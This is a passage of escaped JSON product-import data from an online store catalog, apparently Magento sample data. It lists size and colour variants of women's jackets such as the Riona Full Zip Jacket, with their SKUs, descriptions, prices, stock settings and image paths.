zip,material=Nylon|Polyester|CoolTech&trade;,pattern=Solid,climate=Cool|Spring|Windy|Wintry,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WJ04-XS-Orange,size=XS,color=Orange|sku=WJ04-XS-Red,size=XS,color=Red|sku=WJ04-XS-White,size=XS,color=White|sku=WJ04-S-Orange,size=S,color=Orange|sku=WJ04-S-Red,size=S,color=Red|sku=WJ04-S-White,size=S,color=White|sku=WJ04-M-Orange,size=M,color=Orange|sku=WJ04-M-Red,size=M,color=Red|sku=WJ04-M-White,size=M,color=White|sku=WJ04-L-Orange,size=L,color=Orange|sku=WJ04-L-Red,size=L,color=Red|sku=WJ04-L-White,size=L,color=White|sku=WJ04-XL-Orange,size=XL,color=Orange|sku=WJ04-XL-Red,size=XL,color=Red|sku=WJ04-XL-White,size=XL,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj04-white_alt1.jpg,\\/w\\/j\\/wj04-white_alternate.jpg,\\/w\\/j\\/wj04-white_back.jpg\",\"image\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj04-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj04-white_alt1.jpg,\\/w\\/j\\/wj04-white_alternate.jpg,\\/w\\/j\\/wj04-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Jacket|Lightweight|Full zip\",\"material\":\"Nylon|Polyester|CoolTech&trade;\",\"pattern\":\"Solid\",\"climate\":\"Cool|Spring|Windy|Wintry\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"1222\":{\"sku\":\"WJ05-XS-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-XS-Brown\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-xs-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj05-brown_alt1.jpg,\\/w\\/j\\/wj05-brown_back.jpg\",\"image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj05-brown_alt1.jpg,\\/w\\/j\\/wj05-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Brown\"},\"1223\":{\"sku\":\"WJ05-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-XS-Green\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1224\":{\"sku\":\"WJ05-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-XS-Red\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1225\":{\"sku\":\"WJ05-S-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-S-Brown\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-s-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj05-brown_alt1.jpg,\\/w\\/j\\/wj05-brown_back.jpg\",\"image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj05-brown_alt1.jpg,\\/w\\/j\\/wj05-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Brown\"},\"1226\":{\"sku\":\"WJ05-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-S-Green\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1227\":{\"sku\":\"WJ05-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-S-Red\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1228\":{\"sku\":\"WJ05-M-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-M-Brown\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-m-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj05-brown_alt1.jpg,\\/w\\/j\\/wj05-brown_back.jpg\",\"image\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj05-brown_alt1.jpg,\\/w\\/j\\/wj05-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Brown\"},\"1229\":{\"sku\":\"WJ05-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Riona Full Zip Jacket-M-Green\",\"description\":\"<p>The Riona Basic Zip Jacket makes the perfect extra layer for cold-weather workouts. It features amazing breathability and moisture management, but full-length zipper lets you moderate your core temperature even more.<\\/p>\\n<p>&bull; Brown heather full zip rouched jacket.<br \\/>&bull; Side hand pockets for extra storage.<br \\/>&bull; High collar.<br \\/>&bull; Thick cuffs for extra coverage.<br \\/>&bull; Durable, shape retention material to longer wear.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"riona-full-zip-jacket-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj05-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"requi